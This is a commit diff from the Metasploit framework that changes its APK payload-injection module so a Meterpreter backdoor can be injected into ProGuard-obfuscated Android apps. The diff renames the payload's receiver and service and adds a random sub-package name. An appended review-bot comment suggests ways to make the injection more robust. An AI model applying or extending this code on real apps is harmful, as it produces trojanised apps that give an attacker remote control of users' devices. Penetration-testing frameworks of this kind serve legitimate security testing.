Land #7584, fix apk injection into proguarded apks

Brent Cook 2017-01-11 12:45:23 -06:00
commit b28f600aea
No known key found for this signature in database
GPG Key ID: 1FFAA0B24B708F96
1 changed files with 9 additions and 4 deletions


@ -68,7 +68,7 @@ class Msf::Payload::Apk
} }
end end
def fix_manifest(tempdir) def fix_manifest(tempdir, package)
#Load payload's manifest #Load payload's manifest
payload_manifest = parse_manifest("#{tempdir}/payload/AndroidManifest.xml") payload_manifest = parse_manifest("#{tempdir}/payload/AndroidManifest.xml")
payload_permissions = payload_manifest.xpath("//manifest/uses-permission") payload_permissions = payload_manifest.xpath("//manifest/uses-permission")
@ -98,8 +98,12 @@ class Msf::Payload::Apk
end end
application = original_manifest.at_xpath('/manifest/application') application = original_manifest.at_xpath('/manifest/application')
application << payload_manifest.at_xpath('/manifest/application/receiver').to_xml receiver = payload_manifest.at_xpath('/manifest/application/receiver')
application << payload_manifest.at_xpath('/manifest/application/service').to_xml service = payload_manifest.at_xpath('/manifest/application/service')
receiver.attributes["name"].value = package + receiver.attributes["name"].value
service.attributes["name"].value = package + service.attributes["name"].value
application << receiver.to_xml
application << service.to_xml
File.open("#{tempdir}/original/AndroidManifest.xml", "wb") { |file| file.puts original_manifest.to_xml } File.open("#{tempdir}/original/AndroidManifest.xml", "wb") { |file| file.puts original_manifest.to_xml }
end end
@ -207,6 +211,7 @@ class Msf::Payload::Apk
FileUtils.rm Dir.glob("#{tempdir}/payload/smali/com/metasploit/stage/R*.smali") FileUtils.rm Dir.glob("#{tempdir}/payload/smali/com/metasploit/stage/R*.smali")
package = amanifest.xpath("//manifest").first['package'] package = amanifest.xpath("//manifest").first['package']
package = package + ".#{Rex::Text::rand_text_alpha_lower(5)}"
package_slash = package.gsub(/\./, "/") package_slash = package.gsub(/\./, "/")
print_status "Adding payload as package #{package}\n" print_status "Adding payload as package #{package}\n"
payload_files = Dir.glob("#{tempdir}/payload/smali/com/metasploit/stage/*.smali") payload_files = Dir.glob("#{tempdir}/payload/smali/com/metasploit/stage/*.smali")
@ -232,7 +237,7 @@ class Msf::Payload::Apk
injected_apk = "#{tempdir}/output.apk" injected_apk = "#{tempdir}/output.apk"
aligned_apk = "#{tempdir}/aligned.apk" aligned_apk = "#{tempdir}/aligned.apk"
print_status "Poisoning the manifest with meterpreter permissions..\n" print_status "Poisoning the manifest with meterpreter permissions..\n"
fix_manifest(tempdir) fix_manifest(tempdir, package)
print_status "Rebuilding #{apkfile} with meterpreter injection as #{injected_apk}\n" print_status "Rebuilding #{apkfile} with meterpreter injection as #{injected_apk}\n"
run_cmd("apktool b -o #{injected_apk} #{tempdir}/original") run_cmd("apktool b -o #{injected_apk} #{tempdir}/original")
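Review bot: The name rewrite at `receiver.attributes["name"].value = package + receiver.attributes["name"].value` (and the matching service line) assumes the payload manifest declares its components with a package-relative `android:name` that begins with a dot; if that attribute were ever fully qualified, the concatenation would silently yield a class that does not exist and the receiver and service would never be registered. A guard such as `name = receiver.attributes["name"].value; name = package + name if name.start_with?('.')` keeps the fix while making that assumption explicit. Both `at_xpath` lookups still return nil when the payload manifest lacks the element, so the new `.attributes` call fails with NoMethodError instead of a readable error; raising with a message that names the missing element would be clearer. fix_manifest begins in the earlier hunk, and the suffix it relies on is chosen at `package = package + ".#{Rex::Text::rand_text_alpha_lower(5)}"` in the following hunk; as far as the visible lines show, nothing verifies that this random sub-package does not already exist in the original apk before the payload smali is placed there.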